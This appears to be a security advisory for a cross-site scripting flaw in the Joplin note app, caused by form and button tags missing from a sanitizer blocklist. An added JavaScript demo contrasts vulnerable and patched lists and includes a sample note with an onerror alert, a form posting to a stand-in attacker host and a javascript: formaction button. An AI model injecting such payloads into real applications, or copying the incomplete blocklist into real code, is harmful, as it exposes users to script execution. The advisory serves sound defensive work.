
CVE-2021-37916: Joplin vulnerable to Cross-site Scripting in notes

CVSS Score (v3.1)
6.1

Basic Information

EPSS Score
0.49477%
Published
5/24/2022
Updated
4/23/2024
KEV Status
No
Technology
JavaScript

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package Name | Ecosystem | Vulnerable Versions | First Patched Version
joplin | npm | < 2.0.9 | 2.0.9

Vulnerability Intelligence

Miggo AI Root Cause Analysis

The vulnerability stems from incomplete HTML sanitization in Joplin's rendering pipeline. The HtmlUtils class in htmlUtils.ts sanitizes HTML by filtering elements against a disallowedTags array, and the fix commit shows that form-related tags were missing from that array in vulnerable versions. Because form and button elements were not blocked, any code path that ran user-supplied HTML (such as a note body) through this sanitizer passed those elements through unchanged, and a crafted note could use them, for example via attributes such as onclick or form action handlers, to execute script when the note was rendered. This is the characteristic failure mode of a blocklist-based sanitizer: it is only as complete as its last update, whereas an allowlist of permitted tags and attributes does not silently admit elements nobody thought to list. Confidence in this root cause is high because: 1) the patch explicitly adds these tags to the blocklist; 2) the CVE description directly attributes the vulnerability to form and button elements; 3) the modified file (htmlUtils.ts) is clearly part of the HTML rendering pipeline.
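The following is an added example, not Joplin's htmlUtils.ts and not code from this advisory. It reimplements the pattern the analysis describes, a sanitizer that walks the note body and drops any element whose tag name is in a disallowedTags array, and runs the same constructed note through a "before" list that lacks form-related tags and an "after" list that includes them. The tag lists, the VOID_TAGS set, the helper names and the sample note are all assumptions made for the demonstration; the real project's lists and parser differ.

```javascript
// Added example: minimal blocklist-based HTML sanitizer, in the style the
// root-cause analysis describes. Not Joplin's code; all lists are assumptions.

// Assumed "before" blocklist: form-related tags are missing.
const VULNERABLE_DISALLOWED_TAGS = ['script', 'iframe', 'object', 'embed', 'base', 'link', 'meta'];

// Assumed "after" blocklist: form-related tags added, as the patch description says.
const PATCHED_DISALLOWED_TAGS = [...VULNERABLE_DISALLOWED_TAGS, 'form', 'button', 'input', 'select', 'textarea'];

// Void elements have no closing tag, so they never open a skipped region.
const VOID_TAGS = new Set(['area', 'base', 'br', 'col', 'embed', 'hr', 'img', 'input', 'link', 'meta', 'source', 'track', 'wbr']);

// Simplified tag tokenizer: attribute values containing '>' are not handled.
const TAG_RE = /<(\/?)([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;

// Remove inline event-handler attributes (onclick, onerror, ...) from an attribute string.
function stripEventHandlers(attrs) {
  return attrs.replace(/\s+on[a-zA-Z]+\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/gi, '');
}

// Walk the HTML; drop disallowed elements together with everything nested
// inside them, and strip on* attributes from the elements that are kept.
function sanitizeHtml(html, disallowedTags) {
  const disallowed = new Set(disallowedTags.map((t) => t.toLowerCase()));
  let out = '';
  let last = 0;
  let skipDepth = 0; // > 0 while inside a disallowed element
  for (const m of html.matchAll(TAG_RE)) {
    const [raw, slash, name, attrs] = m;
    const tag = name.toLowerCase();
    if (skipDepth === 0) out += html.slice(last, m.index); // text before this tag
    last = m.index + raw.length;
    const isClose = slash === '/';
    const selfClosing = VOID_TAGS.has(tag) || /\/\s*$/.test(attrs);
    if (disallowed.has(tag)) {
      if (isClose) { if (skipDepth > 0) skipDepth--; }
      else if (!selfClosing) skipDepth++;
      continue; // the disallowed tag itself is never emitted
    }
    if (skipDepth > 0) continue;
    out += isClose ? `</${tag}>` : `<${tag}${stripEventHandlers(attrs)}>`;
  }
  if (skipDepth === 0) out += html.slice(last); // trailing text (dropped if a disallowed element was left open)
  return out;
}

// Constructed note body: benign content plus a form/button pair carrying a
// javascript: formaction, the kind of payload the CVE description points at.
const SAMPLE_NOTE = [
  '<p>Quarterly report <a href="https://example.com/report">link</a></p>',
  '<img src="x" onerror="alert(1)">',
  '<form action="https://attacker.example/collect">',
  '<button formaction="javascript:alert(document.domain)">Save</button>',
  '</form>',
].join('\n');

function renderWithVulnerableList() {
  return sanitizeHtml(SAMPLE_NOTE, VULNERABLE_DISALLOWED_TAGS);
}

function renderWithPatchedList() {
  return sanitizeHtml(SAMPLE_NOTE, PATCHED_DISALLOWED_TAGS);
}

// Regression check a reviewer can run: which tags from a list survive rendering?
function leakedTags(rendered, tags) {
  return tags.filter((t) => new RegExp(`<${t}\\b`, 'i').test(rendered));
}

console.log('vulnerable list leaks:', leakedTags(renderWithVulnerableList(), ['form', 'button']));
console.log('patched list leaks:', leakedTags(renderWithPatchedList(), ['form', 'button']));
```

With the "before" list the form and button reach the renderer intact, even though the same sanitizer already strips the img element's onerror handler; the hole is not the attribute filter but the tag list. With the "after" list the whole form subtree is dropped. The leakedTags check is the kind of test that should accompany any change to a blocklist so that an omission like this one is caught before release.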


WAF Protection Rules

WAF Rule

Joplin before 2.0.9 allows Cross-site Scripting via button and form in the note body.
